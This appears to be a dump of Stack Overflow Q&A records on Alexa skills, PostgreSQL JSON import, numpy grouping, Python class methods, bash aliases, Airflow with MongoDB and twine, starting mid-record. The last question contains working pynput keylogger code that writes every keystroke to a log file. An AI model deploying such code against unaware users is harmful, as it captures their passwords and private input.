"""Handler for Skill Launch."""
def can_handle(self, handler_input):
# type: (HandlerInput) -> bool
return is_request_type("LaunchRequest")(handler_input)
def handle(self, handler_input):
# type: (HandlerInput) -> Response
return handler_input.response_builder.speak(WELCOME_MESSAGE).ask(WHAT_DO_YOU_WANT).response
sb = CustomSkillBuilder(api_client=DefaultApiClient())
sb.add_request_handler(LaunchRequestHandler())
| [
"I understand you are trying to play a streaming music station, if this is the case, this will be implemented using AudioPlayer interface, please find more information on the link below:\nhttps://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html\nThere is an AudioPlayer sample skill which actually streams from a radio station already to which you can refer. That can be found here: https://github.com/alexa-samples/skill-sample-nodejs-audio-player , also in python https://github.com/alexa-samples/skill-sample-python-audio-player . You will need to change the url stream and add your own.\nPlease take into account that the URL you provide in the audioItem.stream.url property must meet these requirements:\nhttps://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html#audio-stream-requirements\n"
] | [
0
] | [] | [] | [
"alexa_app",
"alexa_skill",
"python",
"python_3.x"
] | stackoverflow_0061902502_alexa_app_alexa_skill_python_python_3.x.txt |
Q:
I need to copy data from json file to Postgress
I need to copy data from json file to Postgresql database. I have a json file that have 9000 users with information about them, that looks like this:
"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}
I need to copy data from this file to Postgresql. How can I do this by sql or python. Postgresql database is in local docker compose container
A:
@George Rybojchuk
check complete sql :
drop table if exists sample_json;
drop table if exists target;
create table sample_json(record json not null);
create table target(name varchar(20),time_created varchar(20));
insert into sample_json(record) values('{"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}');
select * from sample_json;
insert into target(name,time_created)
select record->'name',record->'time_created'
from sample_json;
python approach:
import json
if __name__ == '__main__':
records = [
'{"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}',
'{"name": "Kathryn1", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}',
'{"name": "Kathryn2", "time_created": 1665335716, "gender": "male", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}',
]
for record in records:
json_data = json.loads(record)
name = json_data['name']
gender = json_data['gender']
print(name, gender)
# connect postgresql
# insert into target table
| I need to copy data from json file to Postgress | I need to copy data from json file to Postgresql database. I have a json file that have 9000 users with information about them, that looks like this:
"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}
I need to copy data from this file to Postgresql. How can I do this by sql or python. Postgresql database is in local docker compose container
| [
"@George Rybojchuk\ncheck complete sql :\ndrop table if exists sample_json;\ndrop table if exists target;\ncreate table sample_json(record json not null);\ncreate table target(name varchar(20),time_created varchar(20));\ninsert into sample_json(record) values('{\"name\": \"Kathryn\", \"time_created\": 1665335716, \"gender\": \"female\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}');\nselect * from sample_json;\ninsert into target(name,time_created)\nselect record->'name',record->'time_created'\nfrom sample_json;\n\npython approach:\nimport json\n\nif __name__ == '__main__':\n\n records = [\n '{\"name\": \"Kathryn\", \"time_created\": 1665335716, \"gender\": \"female\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}',\n '{\"name\": \"Kathryn1\", \"time_created\": 1665335716, \"gender\": \"female\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}',\n '{\"name\": \"Kathryn2\", \"time_created\": 1665335716, \"gender\": \"male\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}',\n\n ]\n\n for record in records:\n json_data = json.loads(record)\n\n name = json_data['name']\n gender = json_data['gender']\n print(name, gender)\n # connect postgresql\n # insert into target table\n\n"
] | [
0
] | [] | [] | [
"json",
"postgresql",
"python",
"python_3.x",
"sql"
] | stackoverflow_0074603117_json_postgresql_python_python_3.x_sql.txt |
Q:
Numpy: Average of values corresponding to unique coordinate positions
So, I have been browsing stackoverflow for quite some time now, but I can't seem to find the solution for my problem
Consider this
import numpy as np
coo = np.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = np.array([1, 2, 4, 2, 1, 6, 1])
The coo array contains the (x, y) coordinate positions
x = (1, 2, 3, 3, 1, 5, 1)
y = (2, 3, 4, 4, 2, 6, 2)
and the values array some sort of data for this grid point.
Now I want to get the average of all values for each unique grid point.
For example the coordinate (1, 2) occurs at the positions (0, 4, 6), so for this point I want values[[0, 4, 6]].
How could I get this for all unique grid points?
A:
You can sort coo with np.lexsort to bring the duplicate ones in succession. Then run np.diff along the rows to get a mask of starts of unique XY's in the sorted version. Using that mask, you can create an ID array that would have the same ID for the duplicates. The ID array can then be used with np.bincount to get the summation of all values with the same ID and also their counts and thus the average values, as the final output. Here's an implementation to go along those lines -
# Use lexsort to bring duplicate coo XY's in succession
sortidx = np.lexsort(coo.T)
sorted_coo = coo[sortidx]
# Get mask of start of each unique coo XY
unqID_mask = np.append(True,np.any(np.diff(sorted_coo,axis=0),axis=1))
# Tag/ID each coo XY based on their uniqueness among others
ID = unqID_mask.cumsum()-1
# Get unique coo XY's
unq_coo = sorted_coo[unqID_mask]
# Finally use bincount to get the summation of all coo within same IDs
# and their counts and thus the average values
average_values = np.bincount(ID,values[sortidx])/np.bincount(ID)
Sample run -
In [65]: coo
Out[65]:
array([[1, 2],
[2, 3],
[3, 4],
[3, 4],
[1, 2],
[5, 6],
[1, 2]])
In [66]: values
Out[66]: array([1, 2, 4, 2, 1, 6, 1])
In [67]: unq_coo
Out[67]:
array([[1, 2],
[2, 3],
[3, 4],
[5, 6]])
In [68]: average_values
Out[68]: array([ 1., 2., 3., 6.])
A:
You can use where:
>>> values[np.where((coo == [1, 2]).all(1))].mean()
1.0
A:
It is very likely going to be faster to flatten your indices, i.e.:
flat_index = coo[:, 0] * np.max(coo[:, 1]) + coo[:, 1]
then use np.unique on it:
unq, unq_idx, unq_inv, unq_cnt = np.unique(flat_index,
return_index=True,
return_inverse=True,
return_counts=True)
unique_coo = coo[unq_idx]
unique_mean = np.bincount(unq_inv, values) / unq_cnt
than the similar approach using lexsort.
But under the hood the method is virtually the same.
A:
This is a simple one-liner using the numpy_indexed package (disclaimer: I am its author):
import numpy_indexed as npi
unique, mean = npi.group_by(coo).mean(values)
Should be comparable to the currently accepted answer in performance, as it does similar things under the hood; but all in a well tested package with a nice interface.
A:
Another way to do it is using JAX unique and grad. This approach might be particularly fast because it allows you to run on an accelerator (CPU, GPU, or TPU).
import functools
import jax
import jax.numpy as jnp
@jax.grad
def _unique_sum(unique_values: jnp.ndarray, unique_inverses: jnp.ndarray, values: jnp.ndarray):
errors = unique_values[unique_inverses] - values
return -0.5*jnp.dot(errors, errors)
@functools.partial(jax.jit, static_argnames=['size'])
def unique_mean(indices, values, size):
unique_indices, unique_inverses, unique_counts = jnp.unique(indices, axis=0, return_inverse=True, return_counts=True, size=size)
unique_values = jnp.zeros(unique_indices.shape[0], dtype=float)
return unique_indices, _unique_sum(unique_values, unique_inverses, values) / unique_counts
coo = jnp.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = jnp.array([1, 2, 4, 2, 1, 6, 1])
unique_coo, unique_mean = unique_mean(coo, values, size=4)
print(unique_mean.block_until_ready())
The only weird thing is the size argument since JAX requires all array sizes to be fixed / known beforehand. If you make size too small it will throw out good results, too large it will return nan's.
| Numpy: Average of values corresponding to unique coordinate positions | So, I have been browsing stackoverflow for quite some time now, but I can't seem to find the solution for my problem
Consider this
import numpy as np
coo = np.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])
values = np.array([1, 2, 4, 2, 1, 6, 1])
The coo array contains the (x, y) coordinate positions
x = (1, 2, 3, 3, 1, 5, 1)
y = (2, 3, 4, 4, 2, 6, 2)
and the values array some sort of data for this grid point.
Now I want to get the average of all values for each unique grid point.
For example the coordinate (1, 2) occurs at the positions (0, 4, 6), so for this point I want values[[0, 4, 6]].
How could I get this for all unique grid points?
| [
"You can sort coo with np.lexsort to bring the duplicate ones in succession. Then run np.diff along the rows to get a mask of starts of unique XY's in the sorted version. Using that mask, you can create an ID array that would have the same ID for the duplicates. The ID array can then be used with np.bincount to get the summation of all values with the same ID and also their counts and thus the average values, as the final output. Here's an implementation to go along those lines - \n# Use lexsort to bring duplicate coo XY's in succession\nsortidx = np.lexsort(coo.T)\nsorted_coo = coo[sortidx]\n\n# Get mask of start of each unique coo XY\nunqID_mask = np.append(True,np.any(np.diff(sorted_coo,axis=0),axis=1))\n\n# Tag/ID each coo XY based on their uniqueness among others\nID = unqID_mask.cumsum()-1\n\n# Get unique coo XY's\nunq_coo = sorted_coo[unqID_mask]\n\n# Finally use bincount to get the summation of all coo within same IDs \n# and their counts and thus the average values\naverage_values = np.bincount(ID,values[sortidx])/np.bincount(ID)\n\nSample run -\nIn [65]: coo\nOut[65]: \narray([[1, 2],\n [2, 3],\n [3, 4],\n [3, 4],\n [1, 2],\n [5, 6],\n [1, 2]])\n\nIn [66]: values\nOut[66]: array([1, 2, 4, 2, 1, 6, 1])\n\nIn [67]: unq_coo\nOut[67]: \narray([[1, 2],\n [2, 3],\n [3, 4],\n [5, 6]])\n\nIn [68]: average_values\nOut[68]: array([ 1., 2., 3., 6.])\n\n",
"You can use where:\n>>> values[np.where((coo == [1, 2]).all(1))].mean()\n1.0\n\n",
"It is very likely going to be faster to flatten your indices, i.e.:\nflat_index = coo[:, 0] * np.max(coo[:, 1]) + coo[:, 1]\n\nthen use np.unique on it:\nunq, unq_idx, unq_inv, unq_cnt = np.unique(flat_index,\n return_index=True,\n return_inverse=True,\n return_counts=True)\nunique_coo = coo[unq_idx]\nunique_mean = np.bincount(unq_inv, values) / unq_cnt\n\nthan the similar approach using lexsort.\nBut under the hood the method is virtually the same.\n",
"This is a simple one-liner using the numpy_indexed package (disclaimer: I am its author):\nimport numpy_indexed as npi\nunique, mean = npi.group_by(coo).mean(values)\n\nShould be comparable to the currently accepted answer in performance, as it does similar things under the hood; but all in a well tested package with a nice interface.\n",
"Another way to do it is using JAX unique and grad. This approach might be particularly fast because it allows you to run on an accelerator (CPU, GPU, or TPU).\nimport functools\nimport jax\nimport jax.numpy as jnp\n\n\[email protected]\ndef _unique_sum(unique_values: jnp.ndarray, unique_inverses: jnp.ndarray, values: jnp.ndarray):\n errors = unique_values[unique_inverses] - values\n return -0.5*jnp.dot(errors, errors)\n\n\[email protected](jax.jit, static_argnames=['size'])\ndef unique_mean(indices, values, size):\n unique_indices, unique_inverses, unique_counts = jnp.unique(indices, axis=0, return_inverse=True, return_counts=True, size=size)\n unique_values = jnp.zeros(unique_indices.shape[0], dtype=float)\n return unique_indices, _unique_sum(unique_values, unique_inverses, values) / unique_counts\n\n\ncoo = jnp.array([[1, 2], [2, 3], [3, 4], [3, 4], [1, 2], [5, 6], [1, 2]])\nvalues = jnp.array([1, 2, 4, 2, 1, 6, 1])\nunique_coo, unique_mean = unique_mean(coo, values, size=4)\nprint(unique_mean.block_until_ready())\n\nThe only weird thing is the size argument since JAX requires all array sizes to be fixed / known beforehand. If you make size too small it will throw out good results, too large it will return nan's.\n"
] | [
7,
2,
1,
1,
0
] | [] | [] | [
"arrays",
"numpy",
"python"
] | stackoverflow_0031878240_arrays_numpy_python.txt |
Q:
Python: Class method that references today's date, unless class is __init__ with something else
I am probably overengineering this - but I was hoping some can help me understand why this isn't working. My goal was to build a class that primarily uses classmethods, except in the case where a user creates an instance of the class so that they can change the assumed internal date.
import datetime as dt
class Example():
"""
Primary usage is via classmethods, however if historical is needed then create
an instance of the class and pass reference date
"""
@staticmethod
def _get_time_to_mat():
return dt.date.today()
def __init__(self, ref_date):
self.ref_date = ref_date
#change the date the class method uses for **this instance**
def _override_get_time_to_mat():
return self.ref_date
# I was hoping that I could overwrite the function with a new function object
self._get_time_to_mat = _override_get_time_to_mat
@classmethod
def get_date(cls):
return cls._get_time_to_mat()
However, when I run it
example_instance = Example(dt.date(2021,6,1))
print(Example.get_date())
print(example_instance.get_date())
2022-08-28
2022-08-28 # I would expect this to be 2021-06-01 !
Any help is appreciated! Thanks
PS.
I'd like to avoid having to pass a ref_date to the classmethod as an optional argument.
I'd also like to avoid just using an instance of the class where the ref_date is passed with a default of dt.date.today().
A:
Here's how I would implement the behaviour that you want.
class Example():
ref_date = dt.date.today()
def __init__(self, ref_date=None):
if ref_date:
self.ref_date = ref_date
>>> Example.ref_date
datetime.date(2022, 11, 28)
>>> example_instance = Example(dt.date(2021,6,1))
>>> example_instance.ref_date
datetime.date(2021, 6, 1)
Have a class attribute with the default value of the reference date, which gets overwritten if the user instantiates an object with another value. Then get rid of the getter method (it's fine in Python, it's got properties).
A:
I will suggest that to implement this you use class attributes instead of overriding a class method in the initializer.
The following code should work
class Example():
"""
Primary usage is via classmethods, however if historical is needed then create
an instance of the class and pass reference date
"""
ref_date = dt.date.today()
def __init__(self, ref_date=None):
self.ref_date = ref_date
if ref_date:
self._override_class_date(ref_date)
#change the date the class method uses for **this instance**
@classmethod
def _override_class_date(cls, date):
cls.ref_date = date
@classmethod
def get_date(cls):
return cls.ref_date
In the following code the _date is a class atribute, in the case you create an instance, with a new date you override the class attribute with the instance attribute. Note if you assign self.ref_date to the new value in init you will only override the instance value that shadows the class attribute
| Python: Class method that references today's date, unless class is __init__ with something else | I am probably overengineering this - but I was hoping some can help me understand why this isn't working. My goal was to build a class that primarily uses classmethods, except in the case where a user creates an instance of the class so that they can change the assumed internal date.
import datetime as dt
class Example():
"""
Primary usage is via classmethods, however if historical is needed then create
an instance of the class and pass reference date
"""
@staticmethod
def _get_time_to_mat():
return dt.date.today()
def __init__(self, ref_date):
self.ref_date = ref_date
#change the date the class method uses for **this instance**
def _override_get_time_to_mat():
return self.ref_date
# I was hoping that I could overwrite the function with a new function object
self._get_time_to_mat = _override_get_time_to_mat
@classmethod
def get_date(cls):
return cls._get_time_to_mat()
However, when I run it
example_instance = Example(dt.date(2021,6,1))
print(Example.get_date())
print(example_instance.get_date())
2022-08-28
2022-08-28 # I would expect this to be 2021-06-01 !
Any help is appreciated! Thanks
PS.
I'd like to avoid having to pass a ref_date to the classmethod as an optional argument.
I'd also like to avoid just using an instance of the class where the ref_date is passed with a default of dt.date.today().
| [
"Here's how I would implement the behaviour that you want.\nclass Example():\n ref_date = dt.date.today()\n \n def __init__(self, ref_date=None):\n if ref_date:\n self.ref_date = ref_date\n\n>>> Example.ref_date\ndatetime.date(2022, 11, 28)\n>>> example_instance = Example(dt.date(2021,6,1))\n>>> example_instance.ref_date\ndatetime.date(2021, 6, 1)\n\nHave a class attribute with the default value of the reference date, which gets overwritten if the user instantiates an object with another value. Then get rid of the getter method (it's fine in Python, it's got properties).\n",
"I will suggest that to implement this you use class attributes instead of overriding a class method in the initializer.\nThe following code should work\nclass Example():\n \"\"\" \n Primary usage is via classmethods, however if historical is needed then create \n an instance of the class and pass reference date \n \n \"\"\"\n ref_date = dt.date.today() \n \n def __init__(self, ref_date=None):\n self.ref_date = ref_date\n if ref_date:\n self._override_class_date(ref_date)\n \n #change the date the class method uses for **this instance** \n @classmethod\n def _override_class_date(cls, date): \n cls.ref_date = date\n \n @classmethod\n def get_date(cls):\n return cls.ref_date\n\nIn the following code the _date is a class atribute, in the case you create an instance, with a new date you override the class attribute with the instance attribute. Note if you assign self.ref_date to the new value in init you will only override the instance value that shadows the class attribute\n"
] | [
2,
1
] | [] | [] | [
"python"
] | stackoverflow_0074603379_python.txt |
Q:
Bash alias is not detected despite updating .bashrc with alias
I'm trying to set an alias for python to python3, and so far in .bashrc I have set the following:
.bashrc
alias python=python3
Following which, I ran: source ~/.bashrc. However, when I execute which python, it still points to /usr/bin/python, while which python3 returns /user/bin/python3.
I'm currently using bash shell, but I'm not sure why my python is not being aliased correctly to python3.
I've read in some places I need to set the alias in .bash_aliases or .bash_profile but this is my first time doing all of this so I'm a little lost. Appreciate any help!
A:
by definition, "which" will always show the full path of your shell commands, in your case, which python will show /usr/bin/python and for python3 /usr/bin/python3.SO what your system is doing is correct.
An alias definition provides a string value that replaces a command name when the command is read. The alias command does not allow you to use another known command as an alias, you are creating a conflict.
| Bash alias is not detected despite updating .bashrc with alias | I'm trying to set an alias for python to python3, and so far in .bashrc I have set the following:
.bashrc
alias python=python3
Following which, I ran: source ~/.bashrc. However, when I execute which python, it still points to /usr/bin/python, while which python3 returns /user/bin/python3.
I'm currently using bash shell, but I'm not sure why my python is not being aliased correctly to python3.
I've read in some places I need to set the alias in .bash_aliases or .bash_profile but this is my first time doing all of this so I'm a little lost. Appreciate any help!
| [
"by definition, \"which\" will always show the full path of your shell commands, in your case, which python will show /usr/bin/python and for python3 /usr/bin/python3.SO what your system is doing is correct.\nAn alias definition provides a string value that replaces a command name when the command is read. The alias command does not allow you to use another known command as an alias, you are creating a conflict.\n"
] | [
0
] | [] | [] | [
"bash",
"python",
"python_3.x"
] | stackoverflow_0074601847_bash_python_python_3.x.txt |
Q:
Pipeline must be list Airflow
writing a DAG in airflow to extract sum of balance but getting error
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
from datetime import datetime
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow import AirflowException
# Connection
from airflow.providers.mongo.hooks.mongo import MongoHook
def wallet_bal():
hook = MongoHook(mongo_conn_id='mongo_default')
client = hook.get_conn()
print(f"** Connected to MongoDB **- {client.server_info()}")
db = client.test
query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])
wallets_collection = db.aggregate("wallets", query=query)
logger.info(wallets_collection)
logger.info("HI SEE THE PIPELINE")
return 'MONGO DATA TO CONNECT'
dag = DAG('WALLET_DAGS', description='Mongo
Viewer',schedule_interval=None,start_date=datetime(2017, 3, 20), catchup=False)
connect_case_mongo = PythonOperator(task_id='test_wallet', python_callable=wallet_bal, dag=dag)
connect_case_mongo
getting same error again & again after so many diffrent changes
TypeError: pipeline must be a list
[2022-11-28, 11:24:51 UTC] {taskinstance.py:1401} INFO - Marking task as FAILED. dag_id=WALLET_DAGS, task_id=test_wallet, execution_date=20221128T112443, start_date=20221128T112449, end_date=20221128T112451
Tried different scenarios but not able to convert it in list i already have seen previous stack results
A:
my best guess of where your error lies is in either of the two 'aggregate' calls. That is, one/both of these lines has a bug:
query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])
wallets_collection = db.aggregate("wallets", query=query)
I googled your error and found some related questions that confirm this error has nothing to do with Airflow and it is a MongoDB error. There seems to be a bug with your 'aggregate' function call(s). Make sure to look at the MongoDB docs for the 'aggregate' method. It must take a 'pipeline' argument which is of type Sequence[Mapping[str, Any]]. Your first call seems to be correct as 'pipeline' argument is of type List which is type-casted to the required Sequence type I believe.
Your second aggregate call, however, seems to have an issue. Your first argument which gets taken as the 'pipeline' argument is of type string (i.e. "wallets"). This is wrong as'pipeline' parameter is of type Sequence[Mapping[str, Any]] NOT of type string.
You might want to look at this related question: How to store aggregation pipeline in mongoDB?
In short, I'd advice to ensure that your aggregate arguments are of correct type.
| Pipeline must be list Airflow | writing a DAG in airflow to extract sum of balance but getting error
import logging
import json
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
from datetime import datetime
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow import AirflowException
# Connection
from airflow.providers.mongo.hooks.mongo import MongoHook
def wallet_bal():
hook = MongoHook(mongo_conn_id='mongo_default')
client = hook.get_conn()
print(f"** Connected to MongoDB **- {client.server_info()}")
db = client.test
query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])
wallets_collection = db.aggregate("wallets", query=query)
logger.info(wallets_collection)
logger.info("HI SEE THE PIPELINE")
return 'MONGO DATA TO CONNECT'
dag = DAG('WALLET_DAGS', description='Mongo
Viewer',schedule_interval=None,start_date=datetime(2017, 3, 20), catchup=False)
connect_case_mongo = PythonOperator(task_id='test_wallet', python_callable=wallet_bal, dag=dag)
connect_case_mongo
getting same error again & again after so many diffrent changes
TypeError: pipeline must be a list
[2022-11-28, 11:24:51 UTC] {taskinstance.py:1401} INFO - Marking task as FAILED. dag_id=WALLET_DAGS, task_id=test_wallet, execution_date=20221128T112443, start_date=20221128T112449, end_date=20221128T112451
Tried different scenarios but not able to convert it in list i already have seen previous stack results
| [
"my best guess of where your error lies is in either of the two 'aggregate' calls. That is, one/both of these lines has a bug:\n query = db.wallets.aggregate([{'$group': {'_id': None, 'count': {'$sum': '$balance.value'}}}])\n \n wallets_collection = db.aggregate(\"wallets\", query=query)\n\nI googled your error and found some related questions that confirm this error has nothing to do with Airflow and it is a MongoDB error. There seems to be a bug with your 'aggregate' function call(s). Make sure to look at the MongoDB docs for the 'aggregate' method. It must take a 'pipeline' argument which is of type Sequence[Mapping[str, Any]]. Your first call seems to be correct as 'pipeline' argument is of type List which is type-casted to the required Sequence type I believe.\nYour second aggregate call, however, seems to have an issue. Your first argument which gets taken as the 'pipeline' argument is of type string (i.e. \"wallets\"). This is wrong as'pipeline' parameter is of type Sequence[Mapping[str, Any]] NOT of type string.\nYou might want to look at this related question: How to store aggregation pipeline in mongoDB?\nIn short, I'd advice to ensure that your aggregate arguments are of correct type.\n"
] | [
0
] | [] | [] | [
"airflow",
"list",
"mongodb",
"python"
] | stackoverflow_0074600095_airflow_list_mongodb_python.txt |
Q:
twine not found (-bash: twine: command not found)
I am trying to use twine to publish my first python package on pypi (of course will add on test-pypi first).
I followed the official guideline on https://packaging.python.org/tutorials/packaging-projects/.
But for some reason, twine is not found or not properly installed.
I installed twine using:
pip install twine
"pip list" says twine is installed on pip.
After I upgraded twine and everything, when I tried to run:
twine upload --repository-url https://test.pypi.org/legacy/ dist/*
then it says that twine is not found at all:
-bash: twine: command not found .
My system is mac (high sierra) and I am using python2.7 by conda. Pip is also configured to conda python:
>>pip -V
>>pip 10.0.1 from /anaconda2/lib/python2.7/site-packages/pip (python 2.7)
I would appreciate your help.
A:
Use python3 -m twine upload --repository-url https://test.pypi.org/legacy/ dist/*
A:
Based on @hoefling comments run
pip show twine
That will list all files that belong to the twine package. It will output something like this:
Name: twine
Version: 1.12.1
Summary: Collection of utilities for publishing packages on PyPI
Home-page: https://twine.readthedocs.io/
Author: Donald Stufft and individual contributors
Author-email: [email protected]
License: Apache License, Version 2.0
Location: /Users/hakuna.matata/.local/lib/python3.6/site-packages
Requires: pkginfo, readme-renderer, tqdm, requests, requests-toolbelt, setuptools
Required-by:
Note the first file under Files which is ../../../bin/twine and Location: /Users/hakuna.matata/.local/lib/python3.6/site-packages. Of course your user name will replace 'hakuna.matata'
That will lead to a path to package executable at /Users/hakuna.matata/.local/bin which you can add it to your .bash_profile as
export PATH="/Users/hakuna.matata/.local/bin:$PATH"
Then, either restart terminal or
source ~/.bash_profile
A:
Run this command:
python -m twine upload dist/*
| twine not found (-bash: twine: command not found) | I am trying to use twine to publish my first python package on pypi (of course will add on test-pypi first).
I followed the official guideline on https://packaging.python.org/tutorials/packaging-projects/.
But for some reason, twine is not found or not properly installed.
I installed twine using:
pip install twine
"pip list" says twine is installed on pip.
After I upgraded twine and everything, when I tried to run:
twine upload --repository-url https://test.pypi.org/legacy/ dist/*
then it says that twine is not found at all:
-bash: twine: command not found .
My system is mac (high sierra) and I am using python2.7 by conda. Pip is also configured to conda python:
>>pip -V
>>pip 10.0.1 from /anaconda2/lib/python2.7/site-packages/pip (python 2.7)
I would appreciate your help.
| [
"Use python3 -m twine upload --repository-url https://test.pypi.org/legacy/ dist/*\n",
"Based on @hoefling comments run\npip show twine\n\nThat will list all files that belong to the twine package. It will output something like this:\n\nName: twine\nVersion: 1.12.1\nSummary: Collection of utilities for publishing packages on PyPI\nHome-page: https://twine.readthedocs.io/\nAuthor: Donald Stufft and individual contributors\nAuthor-email: [email protected]\nLicense: Apache License, Version 2.0\nLocation: /Users/hakuna.matata/.local/lib/python3.6/site-packages\nRequires: pkginfo, readme-renderer, tqdm, requests, requests-toolbelt, setuptools\nRequired-by: \n\n\nNote the first file under Files which is ../../../bin/twine and Location: /Users/hakuna.matata/.local/lib/python3.6/site-packages. Of course your user name will replace 'hakuna.matata'\nThat will lead to a path to package executable at /Users/hakuna.matata/.local/bin which you can add it to your .bash_profile as \nexport PATH=\"/Users/hakuna.matata/.local/bin:$PATH\"\nThen, either restart terminal or\nsource ~/.bash_profile\n\n",
"Run this command:\npython -m twine upload dist/*\n\n"
] | [
27,
2,
0
] | [] | [] | [
"pip",
"pypi",
"python",
"twine"
] | stackoverflow_0051451966_pip_pypi_python_twine.txt |
Q:
Filling data in one column if there are matching values in another column
I have a DF with parent/child items and I need to associate a time for the parent to all the children items. The time is only listed when the parent matches the child and I need that time to populate on all the children.
This is a simple example.
data = {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 0, 0, 0, 0, 39, 0, 0],
}
The expected results are:
results= {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 51, 51, 51, 39, 39, 39, 39],
}
Seems like it should be easy, but I can't wrap my head around where to start.
A:
If time is positive for the parent, or null, you can use a simple groupby.transform('max'):
df['Time'] = df.groupby('Parent')['Time'].transform('max')
Else, you can use:
df['Time'] = (df['Time']
.where(df['Parent'].eq(df['Child']))
.groupby(df['Parent']).transform('first')
.convert_dtypes()
)
Output:
Parent Child Time
0 a123 a123 51
1 a123 a1231 51
2 a123 a1232 51
3 a123 a1233 51
4 a234 a2341 39
5 a234 a234 39
6 a234 a2342 39
7 a234 a2343 39
| Filling data in one column if there are matching values in another column | I have a DF with parent/child items and I need to associate a time for the parent to all the children items. The time is only listed when the parent matches the child and I need that time to populate on all the children.
This is a simple example.
data = {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 0, 0, 0, 0, 39, 0, 0],
}
The expected results are:
results= {
'Parent' : ['a123', 'a123', 'a123', 'a123', 'a234', 'a234', 'a234', 'a234'],
'Child' : ['a123', 'a1231', 'a1232', 'a1233', 'a2341', 'a234', 'a2342', 'a2343'],
'Time' : [51, 51, 51, 51, 39, 39, 39, 39],
}
Seems like it should be easy, but I can't wrap my head around where to start.
| [
"If time is positive for the parent, or null, you can use a simple groupby.transform('max'):\ndf['Time'] = df.groupby('Parent')['Time'].transform('max')\n\nElse, you can use:\ndf['Time'] = (df['Time']\n .where(df['Parent'].eq(df['Child']))\n .groupby(df['Parent']).transform('first')\n .convert_dtypes()\n)\n\nOutput:\n Parent Child Time\n0 a123 a123 51\n1 a123 a1231 51\n2 a123 a1232 51\n3 a123 a1233 51\n4 a234 a2341 39\n5 a234 a234 39\n6 a234 a2342 39\n7 a234 a2343 39\n\n"
] | [
-1
] | [] | [] | [
"dataframe",
"pandas",
"python"
] | stackoverflow_0074603334_dataframe_pandas_python.txt |
Q:
How to automatically save text file after specific time in python?
This is my keylogger code:
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time
start = time.time()
now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]
def on_press(key):
keys.append(key)
write_file(keys)
try:
print(key.char)
except AttributeError:
print(key)
def write_file(keys):
with open ('log-'+str(dt)+'.txt','w') as f:
for key in keys:
# end=time.time()
# tot_time=end-start
k=str(key).replace("'","")
f.write(k.replace("Key.space", ' ').replace("Key.enter", '\n'))
# if tot_time>5.0:
# f.close()
# else:
# continue
with Listener(on_press=on_press) as listener:
listener.join()
In write_file() function, I've used the close method and also the timer which should automatically save the file after 5 seconds, but that gives me a long 1 paged error whose last line says:
ValueError: I/O operation on closed file.
How do I make my program save the txt file after every 5 seconds and create a new txt file automatically?
NOTE: I actually want the log file to be generated automatically after every 4 hours so that it is not flooded with uncountable words. I've just taken 5 seconds as an example.
A:
The most important problem is that you did not reset the timer. After f.close(), end_time should be transferred into start_time.
Also, since you call write() for every event, there is no reason to accumulate into keys[].
Also, you never empty keys[].
A:
I executed your program and found 2 problems.
